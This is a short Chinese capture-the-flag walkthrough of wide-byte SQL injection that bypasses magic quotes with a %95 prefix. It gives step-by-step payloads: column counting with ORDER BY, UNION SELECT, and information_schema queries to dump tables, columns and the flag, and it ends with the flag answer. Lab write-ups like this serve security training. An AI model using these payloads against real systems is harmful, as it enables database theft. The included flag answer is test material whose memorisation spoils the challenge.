宽字节注入（一）–>get单引号传参

##判断注入
判断有无显错注入发现有魔法引号，因此采用宽字节注入

• %95’ – qwe
  发现宽字节注入有效
  
  亦或者

判断方法

输入’报错，输入’ – q正常运行

判断字段数

• %95’ order by 1 – qwe
  order by 4时报错，order by 3之前都正常，因此有3个字段
  

判断回显点

• and 1=2 union select 1,2,3 – qwe

查当前库名

查询语句

• %95’ union select 1,2,database()-- qwe
  

查表名

查询语句
%95’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database() – qwe’

查行名

查询语句
%95’ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name =(select table_name from information_schema.tables where table_schema = database() limit 0,1 ) – qwe

取数据

%95’ and 1=2 union select 1,2,group_concat(C_Flag) from china_flag – qwe

提交flag

逐一尝试提交准确的flag即可；flag为：zKaQ-Wide